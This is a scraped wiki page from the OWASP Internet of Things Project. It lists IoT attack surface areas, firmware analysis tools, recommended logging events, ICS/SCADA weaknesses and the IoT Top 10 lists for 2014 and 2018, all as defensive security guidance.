* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246188OWASP Internet of Things Project2018-12-19T23:56:13Z<p>Aaron.guzman: /* Contributors */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vishruta Rudresh<br />
* Vijayamurugan Pushpanathan <br />
* Aaron Guzman <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
